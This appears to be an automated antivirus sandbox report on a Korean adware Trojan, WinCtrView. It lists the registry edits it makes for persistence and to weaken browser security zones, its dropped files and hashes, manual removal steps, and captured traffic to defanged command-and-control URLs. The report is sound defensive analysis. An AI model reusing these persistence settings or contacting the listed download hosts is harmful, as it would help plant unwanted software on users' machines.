[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\WinCtrView]
"USER_NO" = "3207"
"Version" = "1425"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\WinCtrView]
"Intro_No" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 43 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\WinCtrView]
"AdFlag" = "Y"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"
"AddToFeedsInitialSelection"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicroProCon"
"MicroProProc"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MicroProCon"
"MicroProProc"
The process irsetup.exe:2560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\WinCtrView]
"PDR" = "asdfaeiqwerh"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"My Video" = ""
[HKCU\Software\WinCtrView]
"SUBNAME" = "MAIN"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\WinCtrView]
"CURDIR" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKCU\Software\WinCtrView]
"ver" = "sup"
"Commit" = "Y"
"USER_NO" = "3207"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\WinCtrView]
"Version" = "0000"
"S_NO" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 0C 08 86 26 4F 61 3B D7 63 73 23 A3 3B 49 D8"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\WinCtrView]
"Upmom" = "Y"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\WinCtrView]
"Owner" = "admin"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WinCtrProc" = "%ApplicationDataFolder%\WinCtrView\Engin\ProVision\WinCtrProc.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WinCtrCon" = "%ApplicationDataFolder%\WinCtrView\Engin\ProVision\WinCtrCon.exe"
Dropped PE files
MD5 | File path |
---|---|
ab737bdca5bd2c94190ec302dfd59c19 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe |
a1ab43b5989a03d746ca9774be160428 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe |
a0a7d422ce7a6959e3dd8762c27b63e7 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\WinCtrView\Engin\ProVision\WinCtrCon.exe |
a1ab43b5989a03d746ca9774be160428 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\WinCtrView\Engin\ProVision\WinCtrProc.exe |
3fe7c92dba5c9240b4ab0d6a87e6166a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe |
ab737bdca5bd2c94190ec302dfd59c19 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\WinCtrCon[1].exe |
a1ab43b5989a03d746ca9774be160428 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\WinCtrProc[1].exe |
90a39346e9b67f132ef133725c487ff6 | c:\WINDOWS\system32\MSINET.OCX |
84742b5754690ed667372be561cf518d | c:\WINDOWS\system32\VB6KO.DLL |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:2700
WinCtrCon.exe:2684
WinCtrCon.exe:2880
WinCtrProc.exe:2352
WinCtrProc.exe:1992
WinCtrProc.exe:2504
WinCtrProc.exe:1764
irsetup.exe:2560 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\FcTimeLab[1].htm (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\ProgramUpdateLab[1].htm (19 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe (409017 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\WinCtrProc[1].exe (409017 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\sTakeList[1].htm (917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\FcTimeLab[1].htm (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\ProgramUpdateLab[1].htm (19 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\sTakeList[1].htm (917 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVision\WinCtrProc.exe (409017 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\WinCtrProc[1].exe (409017 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\httpErrorPagesScripts[1] (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\TransSiteString[1].htm (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\FcPimSLab[1].htm (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\background_gradient[1] (453 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\FormLocation[1].htm (5 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\Uninstall\Uninstaller.exe (89729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\bullet[1] (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\down[1] (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\StakePsList[1].htm (917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\UCg_LPrMLab[1].htm (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\dnserrordiagoff_webOC[1] (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\info_48[2] (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\errorPageStrings[1] (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\keyword_platinum[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\Uninstall_Ctr[1].exe (89729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\ErrorPageTemplate[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\StakePsList[1].htm (917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\httpErrorPagesScripts[1] (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\down[1] (3 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe (48329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\FormLocation[1].htm (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\info_48[1] (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\UCg_LPrMLab[1].htm (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\dnserrordiagoff_webOC[1] (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\WinCtrCon[1].exe (48329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\FcPimSLab[1].htm (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\bullet[1] (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\ErrorPageTemplate[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\errorPageStrings[1] (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\TransSiteString[1].htm (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\background_gradient[1] (453 bytes)
%System%\VB6KO.DLL (2712 bytes)
%System%\MSINET.OCX (2784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (2784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVision\WinCtrCon.exe (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WinCtrProc" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe -oJzqEOx"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WinCtrCon" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe -oJzqEOx"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WinCtrProc" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVision\WinCtrProc.exe -DYOFTdMM"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"(Default)" = "\.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"(Default)" = "\.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WinCtrProc" = "%ApplicationDataFolder%\WinCtrView\Engin\ProVision\WinCtrProc.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WinCtrCon" = "%ApplicationDataFolder%\WinCtrView\Engin\ProVision\WinCtrCon.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
Company Name:
Product Name: Setup Factory 8.0 Runtime
Product Version: 8.2.1.0
Legal Copyright: Setup Engine Copyright (c) 2004-2009 Indigo Rose Corporation
Legal Trademarks: Setup Factory is a trademark of Indigo Rose Corporation.
Original Filename: suf80_launch.exe
Internal Name: suf80_launch
File Version: 8.2.1.0
File Description: Setup Application
Comments: Created with Setup Factory 8.0
Language: Language Neutral
Company Name: Product Name: Setup Factory 8.0 RuntimeProduct Version: 8.2.1.0Legal Copyright: Setup Engine Copyright (c) 2004-2009 Indigo Rose CorporationLegal Trademarks: Setup Factory is a trademark of Indigo Rose Corporation.Original Filename: suf80_launch.exeInternal Name: suf80_launchFile Version: 8.2.1.0File Description: Setup ApplicationComments: Created with Setup Factory 8.0Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 28836 | 32768 | 4.26507 | a8dbcac095aef6f1ff0f56e91c5abc15 |
.rdata | 36864 | 10370 | 12288 | 3.44532 | efb6029b9a5f70171975f6b5a16c78ce |
.data | 49152 | 6440 | 4096 | 1.54728 | cf8d7dd9f4b828868db85743b8601f51 |
.rsrc | 57344 | 28040 | 28672 | 4.06487 | 05962a2c16ea40395e7b662814eba9fd |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 48
0e1bf09cea8e7cf2d8ff215b54ccc3ff
a49308a10aaee870b0df1a54629f8e17
60c64e1ff797f0586d4e4fa8b71590fb
662f48cd18a06ab7fa7a036c39dd5009
a05a82856ecb0e9f04dee5f2b945355c
c3150d4a50452db71ce563353ba982af
d96bf3515187f64e04bc30c105eeffaa
c0bf80b9314aec2b1dca0dcb2662f42d
4f2dafde6729cd7069faa9e1a06ecedb
1dc3cb8f363bde761d4cff6e874f7609
7228c9c464e45dfc0264a4019ca146fb
2597664b2e6285188d3d631b91994a18
75661c1238712c2f813f39573d17e3e7
0fbdc557bdaf578aaa19147db21e4012
43f8dcc02375f67a0e411919bd06b54a
e4c660519851bbe292368e3a7cb00ca9
7de8827aa702c300956323b1f4408aa3
37c7a82fd9d93839940b6755084eb844
a9cfc02550286222aa6b07424e159523
be7bba96ba96a6b248fd7c24a2eb94a6
a1805d6c7edcebbddefd1d32595c4580
b68a1540a80d73a0fedfe26de0b51f5c
1462692343053a348957da43cee36715
533a8afedeb6a7c60817a50267fa531f
9e39362e67d6050c244902574bb7eba7
Network Activity
URLs
URL | IP |
---|---|
hxxp://220.73.162.43/Config/sTakeList.asp?n=3207 | |
hxxp://220.73.162.58/Config/AdNw/FcTimeLab.asp | |
hxxp://220.73.162.58/Config/NewConf/ProgramUpdateLab.asp?version=1423 | |
hxxp://220.73.162.2/Download/WinCtrProc.exe | |
hxxp://hostserver.kr/Config/AdNw/StakePsList.asp?uno=3207 | 220.73.162.54 |
hxxp://220.73.162.45/Config/FormLocation.asp | |
hxxp://220.73.162.45/Config/AdNw/FcPimSLab.asp | |
hxxp://220.73.162.45/Config/newConf/UCg_LPrMLab.asp?user_no=3207 | |
hxxp://220.73.162.45/Config/TransSiteString.asp?nation=KOREA | |
hxxp://220.73.162.4/Download/WinCtrCon.exe | |
hxxp://korserver.com/Config/sTakeList.asp?n=3207 | 220.73.162.52 |
hxxp://220.73.162.24/Config/AdNw/FcTimeLab.asp | |
hxxp://220.73.162.24/Config/NewConf/ProgramUpdateLab.asp?version=1425 | |
hxxp://hostserver.kr/Config/FormLocation.asp | 220.73.162.54 |
hxxp://hostserver.kr/Config/AdNw/FcPimSLab.asp | 220.73.162.54 |
hxxp://hostserver.kr/Config/newConf/UCg_LPrMLab.asp?user_no=3207 | 220.73.162.54 |
hxxp://hostserver.kr/Config/TransSiteString.asp?nation=KOREA | 220.73.162.54 |
hxxp://hostserver.kr/config/keyword_platinum.asp?user_no=3207&SubName=MAIN | 220.73.162.54 |
hxxp://hostserver.kr/Config/ipget.asp?kn=first&usd=3207&SubName=MAIN&preid=0&ver=sup&Version=1425 | 220.73.162.54 |
hxxp://hostserver.kr/Config/ipget.asp?kn=every&usd=3207&SubName=MAIN&preid=0&ver=sup&Version=1425 | 220.73.162.54 |
hxxp://220.73.162.2/Download/Uninstall_Ctr.exe | |
hxxp://220.73.162.54/Config/newConf/UCg_LPrMLab.asp?user_no=3207 | |
hxxp://220.73.162.54/Config/AdNw/FcPimSLab.asp | |
hxxp://220.73.162.54/Config/TransSiteString.asp?nation=KOREA | |
hxxp://220.73.162.54/config/keyword_platinum.asp?user_no=3207&SubName=MAIN | |
hxxp://220.73.162.54/Config/FormLocation.asp | |
hxxp://220.73.162.54/Config/ipget.asp?kn=first&usd=3207&SubName=MAIN&preid=0&ver=sup&Version=1425 | |
hxxp://220.73.162.54/Config/ipget.asp?kn=every&usd=3207&SubName=MAIN&preid=0&ver=sup&Version=1425 | |
hxxp://duzip.com/Config/sTakeList.asp?n=3207 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /Download/Uninstall_Ctr.exe HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.2
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 19 May 2014 04:47:29 GMT
Accept-Ranges: bytes
ETag: "ee1889701d73cf1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:12:41 GMT
Content-Length: 191968
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y.............................`.......Rich............................PE..L...8.yS..................... .......(............@.................................(...........................................(.......@...................................................................8... ....................................text............................... ..`.data...............................@....rsrc...@...........................@..@=..H............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<<
<<< skipped >>>
GET /Config/AdNw/FcTimeLab.asp HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.58
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 159
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCAACASST=GFOFJLBANCCMJPEPACALIDDN; path=/
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:15:45 GMT
5|5|60|hXXp://micronames.co.kr/Download,hXXp://220.73.162.2/Download,http://220.73.162.3/Download,hXXp://220.73.162.4/Download|5|100|100||100|120|Y|Y|Y|Y|Y|Y......
GET /Config/NewConf/ProgramUpdateLab.asp?version=1423 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.58
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCAACASST=GFOFJLBANCCMJPEPACALIDDN
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:15:47 GMT
1425|WinCtrProc.exe..
GET /Config/FormLocation.asp HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.54
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5287
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSAQRDCRT=PMEIBMBABNLIGGHIDHENOBFG; path=/
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:16:18 GMT
hXXp://blink.naver.com|961|C|962|50|R|L|8|8|283#..hXXp://cafe.naver.com/CafeRankingSectionList.nhn?|961|C|962|50|R|L|8|8|283#..hXXp://kin.naver.com/db/detail.php?|961|C|962|50|R|L|10|10|283#..hXXp://news.naver.com|961|C|962|50|R|L|8|8|283#..hXXp://section.blog.naver.com|961|C|962|50|R|L|8|8|283#..hXXp://sample.naver.com|781|C|870|260|R|L|12|12|255#..hXXp://weather.news.naver.com|961|C|962|50|R|L|8|8|283#..hXXp://VVV.naver.com|882|C|882|260|R|L|6|6|255#..hXXp://agora.media.daum.net|978|C|58.34|900|R|L|9|9|430#..hXXp://agoraplaza.media.daum.net/petition/petition.do?|978|C|58.34|900|R|L|9|9|430#..hXXp://blog.daum.net/?|978|C|58.34|900|R|L|9|9|430#..hXXp://blog.daum.net/_blog/_top|978|C|58.34|900|R|L|9|9|430#..hXXp://blog.daum.net/_top/|978|C|58.34|900|R|L|9|9|430#..hXXp://blog.daum.net/_top/layout|978|C|58.34|900|R|L|9|9|430#..http://cafe.daum.net/_c21_/cafefocus_list?|978|C|58.34|900|R|L|9|9|430#..http://cafe.daum.net/_ranking/rank_top100_1.html?|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/support/cafesupport.html?|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/brand/brandstar.html?|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/event/event_list.html?|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/_bbs/0noti/bbs_read?|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/?_top_blogtop=navi_cafehome|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/top/top.html?_top_cafetop=cafehome|978|C|58.34|900|R|L|9|9|430#..hXXp://cartoon.media.daum.net|978|C|58.34|900|R|L|9|9|430#..hXXp://issue.media.daum.ne
<<
<<< skipped >>>
GET /Config/AdNw/FcPimSLab.asp HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.54
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSAQRDCRT=PMEIBMBABNLIGGHIDHENOBFG
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 159
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:16:18 GMT
5|5|60|hXXp://micronames.co.kr/Download,hXXp://220.73.162.2/Download,http://220.73.162.3/Download,hXXp://220.73.162.4/Download|5|100|100||100|120|Y|Y|Y|Y|Y|Y......
GET /Config/newConf/UCg_LPrMLab.asp?user_no=3207 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.54
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSAQRDCRT=PMEIBMBABNLIGGHIDHENOBFG
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 396
Content-Type: text/html
Expires: Sat, 24 May 2014 06:16:19 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:16:19 GMT
KOREA|Y|N|N|Y|hXXp://kr.search.yahoo.com/search?fr=clickstory_kr_synd_search&ovt=A_P_AB_cityfriend_5&p=|Y|N|N|0|hXXp://220.73.162.53/config/LanguageTranslate.asp?hl=[u]&sl=[u]&tl=[1]&p=[KEYWORD]|name="p" value=,16|hXXp://kr.dictionary.search.yahoo.com/search/dictionaryp?subtype=[1]&prop=7&p=[KEYWORD]|50|N|N|N|0|hXXp://VVV.hebogo.com/search/csearch.asp|N|0|N|0|Y|N|N|N|N|Y|Y|Y|0|N|ALRIM|Y|N|N|N|....
GET /Config/TransSiteString.asp?nation=KOREA HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.54
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSAQRDCRT=PMEIBMBABNLIGGHIDHENOBFG
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12071
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 24 May 2014 06:16:19 GMT
